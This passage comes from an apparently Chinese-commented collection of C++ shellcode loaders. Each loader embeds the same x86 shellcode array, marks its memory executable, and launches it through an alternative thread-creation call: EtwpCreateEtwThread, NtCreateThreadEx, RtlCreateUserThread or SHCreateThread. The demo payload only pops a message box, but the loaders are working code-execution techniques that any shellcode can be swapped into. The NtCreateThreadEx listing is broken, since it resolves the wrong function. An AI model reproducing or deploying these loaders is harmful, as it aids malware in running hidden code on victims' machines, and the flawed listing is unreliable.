0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef HANDLE (WINAPI * EtwpCreateEtwThread_t)(LPVOID exec, LPVOID param);
EtwpCreateEtwThread_t EtwpCreateEtwThread;
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
//pEtwpCreateEtwThread EtwpCreateEtwThread;
//得到ntdll的地址
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
EtwpCreateEtwThread = (EtwpCreateEtwThread_t)GetProcAddress(hNtdllModule, "EtwpCreateEtwThread");
if (bRet != 0)
{
// execution
HANDLE h_thread = EtwpCreateEtwThread(exec, NULL);
WaitForSingleObject(h_thread, -1);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
NtCreateThreadEx.cpp
// NtCreateThreadEx.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef NTSTATUS (NTAPI * NtCreateThreadEx_t)(
PHANDLEThreadHandle,//用于存储新线程的句柄
ACCESS_MASKDesiredAccess,//新线程的访问权限
LPVOIDObjectAttributes,//与线程相关的对象属性
HANDLEProcessHandle,//要在其中创建线程的进程的句柄
LPTHREAD_START_ROUTINEStartRoutine,//线程的起始地址,即线程将从此地址开始执行。
PVOIDArgument,//传递给线程起始地址的参数
ULONGCreateFlags,// 用于指定线程创建的标志
ULONGZeroBits,// 线程栈中零位的数量
SIZE_TStackSize,//线程栈的大小
SIZE_TMaximumStackSize,//线程栈的最大大小
PVOIDAttributeList//指向线程属性列表的指针
);
NtCreateThreadEx_t pNtCreateThreadEx;
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
//拿到NtCreateThreadEx函数地址
pNtCreateThreadEx = (NtCreateThreadEx_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlCreateUserThread");
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
HANDLE hThread = 0;
if (bRet != 0)
{
pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)exec, NULL, NULL, NULL, NULL, NULL, NULL );
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
RtlCreateUserThread-内核函数.cpp
// RtlCreateUserThread-内核函数.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS (NTAPI * RtlCreateUserThread_t)(
HANDLE ProcessHandle,//在其中创建线程的进程的句柄。
PSECURITY_DESCRIPTOR SecurityDescriptor,//用于控制线程访问权限的安全描述符
BOOLEAN CreateSuspended,//如果为 TRUE,则创建的线程将以挂起状态启动。
ULONG StackZeroBits,//用于控制线程栈的分配
PULONG StackReserved,// 用于控制线程栈的分配。
PULONG StackCommit,// 用于控制线程栈的分配。
LPTHREAD_START_ROUTINE StartAddress,//线程的起始地址,即线程将从此地址开始执行。
PVOID StartParameter,//传递给线程起始地址的参数
PHANDLE ThreadHandle,//用于存储新线程的句柄。
PCLIENT_ID ClientID//用于存储新线程的客户端标识。
);
RtlCreateUserThread_t pRtlCreateUserThread;
int main()
{
//得到内核函数地址
pRtlCreateUserThread = (RtlCreateUserThread_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlCreateUserThread");
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
HANDLE hThread = NULL;
if (bRet != 0)
{
pRtlCreateUserThread(GetCurrentProcess(), NULL, FALSE, NULL, NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL,&hThread, NULL);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox),MEM_RELEASE);
}
SHCreateThread.cpp
// SHCreateThread.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
#include <stdint.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi")
// Payload: raw x86 machine code that the loader copies into a VirtualAlloc'd
// region and runs from there; it is never invoked as C code.
// Notes for readers (all visible in the bytes below):
//  - Despite "nullfree" in the name, the array contains 0x00 bytes (e.g. the
//    zero-padded call displacements and the trailing 0x00).
//  - The DLL and API names it needs are embedded as plain ASCII/UTF-16 runs
//    ("user32.dll", "MessageBoxA", "GetProcAddress", "LoadLibraryA",
//    "kernel32.dll"), along with the strings "HelloWorld" and "Test", so the
//    blob is readily recognisable to string-based scanning and to an analyst.
//  - The same array appears verbatim in each listing on this page.
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
// Demo entry point: hands the payload to shlwapi!SHCreateThread, a shell
// helper that wraps thread creation, instead of calling CreateThread directly.
int main()
{
// Reserve and commit a private RW region for the payload; the result is not
// checked, so a NULL from VirtualAlloc is written through by RtlMoveMemory.
PVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
